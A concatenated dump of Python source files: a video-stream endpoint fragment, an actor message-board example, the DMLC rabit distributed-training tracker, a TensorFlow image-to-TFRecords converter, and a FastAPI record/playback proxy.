LiveVideo.StartThread()
while True:
yield b'--frame\r\nContent-Type: image/jpeg\r\n\r\n' + LiveVideo.GetFrame() + b'\r\n'
def Stream():
streamHeaders = [i for i in serverConfig.DEFAULT_RESPONSE_HEADER.items()]
if Auth([serverConfig.ADMIN_ID]):
return Response(GenVideo(), mimetype='multipart/x-mixed-replace;boundary=frame',
headers=streamHeaders)
else:
abort(403) |
main-state-example.py | from message_board import MSGBoard
from node import Actor
def determin_method(get_actor, get_info):
if get_info == 'quick':
if get_actor.create_message(request='get_quick_info') ==
def foo(bar, baz, nay):
return bar + baz + nay
def bar():
return 3
def baz():
return 30
def kay():
return 300
def jay():
return 3000
def nay(kay, jay):
return kay + jay
def show(foo):
print(foo)
return True
def shutdown():
import sys
print('shutting down')
sys.exit()
exit()
def get_actor():
frame_infos = inspect.stack() # A list of FrameInfo.
frame = frame_infos[1].frame # The frame of the caller.
locs = frame.f_locals # The caller's locals dict.
return locs['self']
def change_msg_board(get_actor, get_second_msg_board):
get_actor.set_messageboard(get_second_msg_board.name)
def get_second_msg_board(get_actor):
return get_actor.msgboards[1]
def print_something(get_second_msg_board):
print(get_second_msg_board.name)
return get_second_msg_board
# def user_input():
# import threading
# import time
# import sys
#
# def background():
# while True:
# time.sleep(3)
# print('disarm me by typing disarm')
#
#
# def show_trigger():
# .msgboards.append(msgboard)
#
# new_id = thoughts.produce_id()
# message = {'id': new_id, 'ref_id': new_id, 'request': 'show'}
# actor_user.say(message, thoughts)
#
# # now threading1 runs regardless of user input
# threading1 = threading.Thread(target=background)
# threading1.daemon = True
# threading1.start()
#
# while True:
# if input() == 'disarm':
# show_trigger()
# sys.exit()
# else:
# print('not disarmed')
# these function details could be deduced from their signature instead of made explicit...
actor_foo = Actor(verbose=True)
actor_kay = Actor(verbose=True)
actor_user = Actor(accepts_user_input=True, verbose=True)
thoughts = MSGBoard('thoughts')
words = MSGBoard('words')
actor_foo.listen(thoughts)
actor_kay.listen(thoughts)
actor_user.listen(thoughts)
actor_user.add_functions(functions=[show, shutdown])
actor_foo.add_functions(functions=[foo, baz, shutdown])
actor_kay.add_functions(functions=[bar, kay, jay, nay, shutdown])
actor_foo.add_trigger(cause='show', effect='foo')
|
tracker.py | """
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s.encode())
def recvstr(self):
slen = self.recvint()
return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
magic = slave.recvint()
assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connection was successuly setup
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=5991, port_end=5999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error as e:
if e.errno in [98, 48]:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
"""
get enviroment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map, this is a bit hacky, call for better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
# set of nodes that finishs the job
shutdown = {}
# set of nodes that is waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that is pending to be assigned rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that is pending for getting up
todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Recieve %s signal from %s; assign rank %d',
s.cmd, s.host, s.rank)
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
while self.thread.isAlive():
self.thread.join(100)
class PSTracker(object):
"""
Tracker module for PS
"""
def __init__(self, hostIP, cmd, port=5910, port_end=5930, envs=None):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
envs = {} if envs is None else envs
self.hostIP = hostIP
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(
target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True)), args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
if self.cmd is not None:
while self.thread.isAlive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def get_host_ip(hostIP=None):
if hostIP is None or hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warn('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 1))
hostIP = s.getsockname()[0]
return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
if nserver == 0:
pscmd = None
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
hostIP = get_host_ip(hostIP)
if nserver == 0:
rabit = RabitTracker(hostIP=hostIP, nslave=nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
else:
pserver = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
envs.update(pserver.slave_envs())
fun_submit(nworker, nserver, envs)
if nserver == 0:
rabit.join()
else:
pserver.join()
def start_rabit_tracker(args):
"""Standalone function to start rabit tracker.
Parameters
----------
args: arguments to start the rabit tracker.
"""
envs = {'DMLC_NUM_WORKER' : args.num_workers,
'DMLC_NUM_SERVER' : args.num_servers}
rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
envs.update(rabit.slave_envs())
rabit.start(args.num_workers)
sys.stdout.write('DMLC_TRACKER_ENV_START\n')
# simply write configuration to stdout
for k, v in envs.items():
sys.stdout.write('%s=%s\n' % (k, str(v)))
sys.stdout.write('DMLC_TRACKER_ENV_END\n')
sys.stdout.flush()
rabit.join()
def main():
"""Main function if tracker is executed in standalone mode."""
parser = argparse.ArgumentParser(description='Rabit Tracker start.')
parser.add_argument('--num-workers', required=True, type=int,
help='Number of worker proccess to be launched.')
parser.add_argument('--num-servers', default=0, type=int,
help='Number of server process to be launched. Only used in PS jobs.')
parser.add_argument('--host-ip', default=None, type=str,
help=('Host IP addressed, this is only needed ' +
'if the host IP cannot be automatically guessed.'))
parser.add_argument('--log-level', default='DEBUG', type=str,
choices=['INFO', 'DEBUG'],
help='Logging level of the logger.')
args = parser.parse_args()
fmt = '%(asctime)s %(levelname)s %(message)s'
if args.log_level == 'INFO':
level = logging.INFO
elif args.log_level == 'DEBUG':
level = logging.DEBUG
else:
raise RuntimeError("Unknown logging level %s" % args.log_level)
logging.basicConfig(format=fmt, level=level)
if args.num_servers == 0:
start_rabit_tracker(args)
else:
raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
OID2TFRecords.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected eror while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
main.py | import websocket as _websocket
from fastapi import FastAPI
from fastapi import WebSocket as fWebSocket
from starlette.endpoints import WebSocketEndpoint
from starlette.requests import Request
from starlette.responses import Response, StreamingResponse
from httpx import AsyncClient
from io import BytesIO
import sys
import time
import threading
import os
from waiting import wait
import logging
from color_logger import logger
import asyncio
import settings
from recorder import Recorder
from player import Player
import utils
client = AsyncClient()
app = FastAPI()
recorder: Recorder = None
player: Player = None
is_playback = False
is_record = False
is_proxy = False
def accept_socket(message: str):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(inSocket.send_bytes(message.encode('utf-8')))
def print_welcome(mode: str):
record: str = None
if settings.record_name != None:
record = f" {settings.record_name} "
else:
record = " "
logger.info("*************************************************")
logger.info(f"\n\nSTARTING{record}IN {mode} MODE\n\n")
logger.info("*************************************************")
def quit_proxy():
os.system("kill -9 `ps -jaxwww | grep \"[.]/playback-proxy\" | awk '{print $2}'`")
def start(record_name: str = None, mode: str = None):
if record_name != None and mode != None:
settings.mode = mode
settings.record_name = record_name
set_mode()
if is_record:
utils.set_paths()
print_welcome("RECORDING")
global recorder
recorder = Recorder()
recorder.prepare()
elif is_playback:
utils.set_paths()
print_welcome("PLAYBACK")
global player
player = Player(accept_socket)
player.prepare()
elif is_proxy:
print_welcome("PROXY")
def set_mode():
global is_playback
global is_record
global is_proxy
is_playback = settings.mode == "PLAYBACK"
is_record = settings.mode == "RECORD"
is_proxy = is_record or settings.mode == "PROXY"
settings.load_envs()
start()
def proxied_url(rop: str):
return f"{settings.protocol}{settings.endpoint}{rop}"
async def proxy_request(request: Request, rop: str):
if is_proxy and rop not in settings.ignore_log:
logger.info(f"Asking {request.method} {request.url}")
result: httpx.Response
if is_playback:
result = player.load_next(rop)
else:
body = await request.body()
result = await client.request(
method=request.method,
url=proxied_url(rop),
params=request.query_params,
content=body
)
if is_record:
recorder.save(rop, result)
if is_proxy and rop not in settings.ignore_log:
logger.info(f"Received {result.status_code} from {result.url}")
headers = result.headers
content_type = None
response: Response = None
try:
content_type = result.headers['content-type']
except KeyError:
response = Response(
result.text,
headers=headers,
status_code=result.status_code
)
if response == None and result.headers['content-type'] == 'application/json':
response = Response(
result.text,
media_type="application/json",
headers=headers,
status_code=result.status_code
)
elif response == None and result.headers['content-type'].startswith("image"):
response = StreamingResponse(
BytesIO(result.content),
media_type=result.headers['content-type'],
headers=headers,
status_code=result.status_code
)
return response
@app.get("/{rest_of_path:path}")
async def on_get(request: Request, rest_of_path: str):
return await proxy_request(request, rest_of_path)
@app.post("/{rest_of_path:path}")
async def on_post(request: Request, rest_of_path: str):
split = rest_of_path.split("/")
if split[0] == "__playback-proxy":
if split[1] == "quit":
logger.info("Quitting proxy")
quit_proxy()
return Response("Shutting down proxy", media_type='text/plain')
elif split[1] == "record":
start(split[-1], "RECORD")
return Response(f"Re-starting proxy for {split[-1]} in RECORD mode", media_type='text/plain')
elif split[1] == "play":
start(split[-1], "PLAYBACK")
return Response(f"Re-starting proxy for {split[-1]} in PLAYBACK mode", media_type='text/plain')
return await proxy_request(request, rest_of_path)
@app.put("/{rest_of_path:path}")
async def on_put(request: Request, rest_of_path: str):
return await proxy_request(request, rest_of_path)
@app.delete("/{rest_of_path:path}")
async def on_delete(request: Request, rest_of_path: str):
return await proxy_request(request, rest_of_path)
out_connected = False
inSocket: fWebSocket
outSocket: _websocket.WebSocketApp
out_socket_endpoint = f"{settings.socket_protocol}{settings.endpoint}{settings.socket_rop}"
def outConnected():
return out_connected
if settings.socket_rop is not None:
logger.info(f"Setting up socket on {settings.socket_rop}")
@app.websocket_route(f"/{settings.socket_rop}")
class MessagesEndpoint(WebSocketEndpoint):
async def on_connect(self, in_ws):
global inSocket, outSocket
inSocket = in_ws
await in_ws.accept()
logger.info(f"IN socket connected on {settings.socket_rop}")
if is_record:
global recorder
recorder.start()
elif is_playback:
player.start()
if is_proxy:
outSocket = _websocket.WebSocketApp(out_socket_endpoint,
on_message = out_on_message,
on_error = out_on_error,
on_close = out_on_close)
outSocket.on_open = out_on_open
t = threading.Thread(target=outSocketThread, args=(outSocket,))
t.daemon = True
t.start()
wait(outConnected)
async def on_receive(self, in_ws, data) -> None:
logger.info("Received from IN socket " + data.decode("utf-8"))
if is_proxy:
outSocket.send(data)
async def on_disconnect(self, in_ws, close_code):
logger.info(f"IN socket disconnected on {settings.socket_rop}")
def outSocketThread(ws: _websocket):
ws.on_open = out_on_open
ws.run_forever()
def out_on_message(ws, message):
logger.info(f"Received from OUT socket {message}")
if is_record:
global recorder
recorder.save_socket(message)
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(inSocket.send_bytes(message))
def out_on_error(ws, error):
logger.error(f"Got error on OUT socket {error}")
def out_on_close(ws):
logger.warning(f"OUT socket was closed")
def out_on_open(ws):
logger.info(f"OUT socket connected to {out_socket_endpoint}")
global out_connected
out_connected = True
|
